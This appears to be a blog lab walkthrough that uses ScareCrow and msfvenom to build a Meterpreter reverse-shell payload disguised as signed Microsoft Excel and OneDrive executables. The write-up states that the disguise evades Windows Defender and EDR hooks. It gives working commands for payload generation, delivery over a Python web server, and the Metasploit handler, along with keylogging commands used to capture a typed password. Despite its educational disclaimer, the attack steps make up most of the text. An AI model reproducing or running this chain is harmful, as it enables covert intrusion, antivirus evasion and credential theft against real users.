Creating Payloads with ScareCrow to Mimic Reputable Sources and Bypass Anti-Virus

This write-up discusses using ScareCrow to create payload frameworks for side loading (not injecting) into a legitimate Windows process, bypassing Application Whitelisting controls.

After loading the DLL loader into memory, a technique is employed to flush an Endpoint Detection & Response (EDR) hook out of the system DLLs running in the process’s memory. This technique is successful because it is known that the EDR’s hooks are placed when a process is launched.

ScareCrow can target and manipulate DLLs in memory using the API function VirtualProtect. This function changes the permissions of a process’s memory section from Execute-Read to Read-Write-Execute.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

• VirtualBox
• ReviOS — Windows 11 VM (Victim)
• Parrot OS VM (Attacker)

ScareCrow Installation

GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.

Setup Payloads

First, we use msfvenom to generate a Meterpreter reverse TCP shell.

sudo msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.0.200.30 LPORT=443 -f raw -o av-bypass.bin

Copy the av-bypass.bin file to the ScareCrow directory.

Type the following command to start ScareCrow and generate a payload.

./ScareCrow -I av-bypass.bin -domain <enter_domain_here_> -encryptionmode AES

A OneDrive .exe payload is generated.

Each time we execute the ./ScareCrow command, we get a different option. For example, if we rerun the command, we get an Outlook.exe payload.

We also created a OneNote.exe and an Excel.exe payload.

The generated payloads are in the ScareCrow directory.

Make a new payloads directory within the ScareCrow and copy the payloads to the payloads directory.

Start an HTTP server on port 80 using Python3 to allow users to serve files from the payloads directory over HTTP.

sudo python3 -m http.server 80

This msfconsole command launches the Metasploit console in quiet mode, suppressing banner and startup messages for a streamlined experience.

sudo msfconsole -q

This sequence of commands is used within the Metasploit Framework (msfconsole) to set up a handler to receive a reverse TCP shell connection.

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set LHOST 10.0.200.30

set LPOST 443

run

It specifies the payload type (windows/x64/meterpreter_reverse_tcp), sets the listener's host IP address (LHOST) to 10.0.200.30, and the listener's port (LPORT) to 443. Finally, the run command initiates the handler, waiting for a connection from a target machine.

Executing the Payloads

In a real-world scenario, an attacker would probably send the payload via email or other methods, but for the demonstration purposes of this lab, we will open the Brave browser on the victim machine and navigate to 10.0.200.30.

The web server we created using Python3 is listing all of our payloads.

We will download and save the Excel.exe and OneDrive.exe files onto the victim’s machine.

We can also see the responses in the web server we created.

After saving the files, we can check the victim’s Downloads folder to find the Excel and OneDrive files with their actual icons. This is why ScareCrow is used.

Right-click on the Excel file → Click Properties → Click Details.

Here, we can also see that Microsoft appears to have signed Excel.exe. It looks completely real, and Windows Defender won’t pick it up.

When we double-click the Excel file, it doesn’t look like what Excel would typically do, but it will run the payload and open a meterpreter session.

When we type the command help, we can see all the commands we can run.

To test that it’s functional, we can start a keyscan.

Type the following command in the meterpreter session:

keyscan_start

On the victim machine, we opened Notepad and typed, “My password is password123.”

Typing keyscan_dump shows us what was typed on the victim machine.

keyscan_dump

Back in Notepad, we added, “it captured capitalized letters as well.”

So, every time we type keyscan_dump in meterpreter, it shows us the typed new text.

To stop the scan, we can type:

keyscan_stop

Now, what we type won’t be scanned.

By typing shell, we can open up a shell. We can then open the victim’s browser and direct them to a particular website using the following command:

explorer "https://google.com"

The following TASKKILL command will kill the Brave processes.

TASKKILL /F /IM brave.exe

Conclusion

Thank you for reading this article. I hope that you have found the information provided valuable and helpful.

Follow me for more articles.

Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!